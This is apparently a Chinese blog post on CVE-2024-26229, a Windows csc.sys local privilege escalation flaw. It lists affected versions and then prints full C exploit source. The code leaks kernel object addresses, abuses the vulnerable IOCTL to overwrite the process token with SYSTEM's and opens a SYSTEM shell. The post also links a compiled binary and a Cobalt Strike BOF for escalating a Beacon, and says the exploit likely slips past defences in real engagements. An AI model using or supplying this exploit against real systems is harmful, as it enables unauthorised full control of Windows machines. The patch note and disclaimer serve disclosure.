Windows CSC服务特权提升漏洞(CVE-2024-26229)

文章目录


前言

Windows CSC服务特权提升漏洞。 当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从而控制受影响的系统、执行任意命令、安装恶意软件或访问敏感数据。

二、漏洞成因

(CVE-2024-26229)Windows CSC服务特权提升漏洞,csc.sys驱动程序中带有METHOD_NEITHER I/O控制代码的IOCTL地址验证不正确。当IOCTL使用METHOD_NEITHER选项进行I/O控制时,IOCTL有责任验证提供给它的地址,如果验证缺失或不正确,攻击者可以提供任意内存地址,从而导致代码执行拒绝服务

三、影响版本

Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems

四、漏洞复现

利用条件:这个提权漏洞需要目标主机启用csc服务,可以使用sc qc csc 命令查询,START_TYPE为DISABLED禁用SYSTEM_START启用

Tips:2008/2012没有这服务(无法利用),2016/2019/2022有该服务,但是默认都禁用了,而且没法启动。实战项目测试中如果遇到Win 10/11时可以试试用这个exp来提权,而且大概率能绕过一些防护的拦截。

本地复现环境为

脚本如下:

#/* 
				PoC Info
-------------------------------------------
Vulnerability:	CVE-2024-26229
Environment:	Windows 11 22h2 Build 22621
-------------------------------------------
*/
#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <stdint.h>

// I use ntdllp.lib private library from VS SDK to avoid GetProcAddress for Nt* functions
#pragma comment(lib, "ntdllp.lib")
#define STATUS_SUCCESS 0

#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
#define EPROCESS_TOKEN_OFFSET			0x4B8
#define KTHREAD_PREVIOUS_MODE_OFFSET	0x232
#define CSC_DEV_FCB_XXX_CONTROL_FILE    0x001401a3 // vuln ioctl

#define SystemHandleInformation			0x10
#define SystemHandleInformationSize		0x400000 

enum _MODE
{
    KernelMode = 0,
	UserMode = 1
};

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
	ULONG NumberOfHandles;
	SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;


//
// Get the kernel object pointer for the specific process by it's handle
// 
int32_t GetObjPtr(_Out_ PULONG64 ppObjAddr, _In_ ULONG ulPid, _In_ HANDLE handle)

{
	int32_t Ret = -1;
	PSYSTEM_HANDLE_INFORMATION pHandleInfo = 0;
	ULONG ulBytes = 0;
	NTSTATUS Status = STATUS_SUCCESS;

    //
    // Handle heap allocations to overcome STATUS_INFO_LENGTH_MISMATCH
    //
	while ((Status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == 0xC0000004L)
	{
		if (pHandleInfo != NULL)
		{
			pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, (size_t)2 * ulBytes);
		}

		else
		{
			pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (size_t)2 * ulBytes);
		}
	}

	if (Status != NULL)
	{
		Ret = Status;
		goto done;
	}

	for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++)
	{
		if ((pHandleInfo->Handles[i].UniqueProcessId == ulPid) && (pHandleInfo->Handles[i].HandleValue == (unsigned short)handle))
		{
			*ppObjAddr = (unsigned long long)pHandleInfo->Handles[i].Object;
			Ret = 0;
			break;
		}
	}

	done:
	if (pHandleInfo != NULL)
	{
		HeapFree(GetProcessHeap, 0, pHandleInfo);
	}
	return Ret;
}

//
// A wrapper to make arbitrary writes to the whole system memory address space
//
NTSTATUS Write64(_In_ uintptr_t *Dst, _In_ uintptr_t *Src, _In_ size_t Size)
{
	NTSTATUS Status = 0;
	size_t cbNumOfBytesWrite = 0;

	Status = NtWriteVirtualMemory(GetCurrentProcess(), Dst, Src, Size, &cbNumOfBytesWrite);
	if (!NT_SUCCESS(Status)) 
    {
		return -1;
	}
	return Status;
}

//
//
//
NTSTATUS Exploit()
{
	UNICODE_STRING  objectName = { 0 };
	OBJECT_ATTRIBUTES objectAttr = { 0 };
	IO_STATUS_BLOCK iosb = { 0 };
	HANDLE handle;
	NTSTATUS status = 0;

	//
	// Initialize kernel objects to leak
	//
	uintptr_t Sysproc = 0;
	uintptr_t Curproc = 0;
	uintptr_t Curthread = 0;
	uintptr_t Token = 0;

	HANDLE hCurproc = 0;
	HANDLE hThread = 0;
	uint32_t Ret = 0;
	uint8_t mode = UserMode;

	RtlInitUnicodeString(&objectName, L"\\Device\\Mup\\;Csc\\.\\.");
	InitializeObjectAttributes(&objectAttr, &objectName, 0, NULL, NULL);
	
	status = NtCreateFile(&handle, SYNCHRONIZE, &objectAttr, &iosb, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, FILE_CREATE_TREE_CONNECTION, NULL, 0);
	if (!NT_SUCCESS(status))
	{
		printf("[-] NtCreateFile failed with status = %x\n", status);
		return status;
	}

	//
	// Leak System _EPROCESS kernel address
	// 
	Ret = GetObjPtr(&Sysproc, 4, 4);
	if (Ret != NULL)
	{
		return Ret;
	}
	printf("[+] System EPROCESS address = %llx\n", Sysproc);

	//
	// Leak current _KTHREAD kernel address
	//
	hThread = OpenThread(THREAD_QUERY_INFORMATION, TRUE, GetCurrentThreadId());
	if (hThread != NULL)
	{
		Ret = GetObjPtr(&Curthread, GetCurrentProcessId(), hThread);
		if (Ret != NULL)
		{
			return Ret;
		}
		printf("[+] Current THREAD address = %llx\n", Curthread);
	}

	//
	// Leak current _EPROCESS kernel address
	//
	hCurproc = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, GetCurrentProcessId());
	if (hCurproc != NULL)
	{
		Ret = GetObjPtr(&Curproc, GetCurrentProcessId(), hCurproc);
		if (Ret != NULL)
		{
			return Ret;
		}
		printf("[+] Current EPROCESS address = %llx\n", Curproc);
	}

	//
	// Sending the payload to the csc.sys driver to trigger the bug
	//
	status = NtFsControlFile(handle, NULL, NULL, NULL, &iosb, CSC_DEV_FCB_XXX_CONTROL_FILE, /*Vuln arg*/ (void*)(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET - 0x18), 0, NULL, 0);
	if (!NT_SUCCESS(status))
	{
		printf("[-] NtFsControlFile failed with status = %x\n", status);
		return status;
	}

	printf("[!] Leveraging DKOM to achieve LPE\n");
	printf("[!] Calling Write64 wrapper to overwrite current EPROCESS->Token\n");
	
	Write64(Curproc + EPROCESS_TOKEN_OFFSET, Sysproc + EPROCESS_TOKEN_OFFSET, 0x8);

	//
	// Restoring KTHREAD->PreviousMode
	//
	Write64(Curthread + KTHREAD_PREVIOUS_MODE_OFFSET, &mode, 0x1);

	//
	// spawn the shell with "nt authority\system"
	//

	system("cmd.exe");

	return STATUS_SUCCESS;
}


int main()
{
	NTSTATUS status = 0;
	status = Exploit();

	return status;
}

编译好的exe在这下载点击前往

编译完成后直接在本地运行能够成功利用

五、CVE-2024-26229 BOF

CVE-2024-26229-BOF工具利用起来更简单更好(内存执行,无需落地),使用inline-execute执行BOF文件即可将当前Beacon提升为SYSTEM。

下载地址:

https://github.com/NVISOsecurity/CVE-2024-26229-BOF

编译:

gcc -c CVE-2024-26229-bof.c -o CVE-2024-26229-bof.o

六、修复方案

该漏洞已于2024年4月9日修复,详情请参阅如下

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26229
相关推荐
gywl1 分钟前
openEuler VM虚拟机操作(期末考试)
linux·服务器·网络·windows·http·centos
某柚啊1 小时前
Windows开启IIS后依然出现http error 503.the service is unavailable
windows·http
码农君莫笑2 小时前
信管通低代码信息管理系统应用平台
linux·数据库·windows·低代码·c#·.net·visual studio
蜜獾云4 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld
唐宋元明清21884 小时前
Windows 记录开机后应用启动慢的问题
windows·系统异常
越甲八千6 小时前
重温设计模式--中介者模式
windows·设计模式·中介者模式
网络安全(华哥)9 小时前
X-Forwarded-For注入漏洞
windows·安全·web安全
styshoo10 小时前
wsl安装ubuntu 18.04
运维·windows·ubuntu
BothSavage10 小时前
Knife4j在Gateway下的URI优化以及热刷新
windows·gateway
火龙kess12 小时前
使用FreeNAS软件部署ISCSI的SAN架构存储(IP-SAN)练习题
linux·运维·服务器·网络·windows·tcp/ip·架构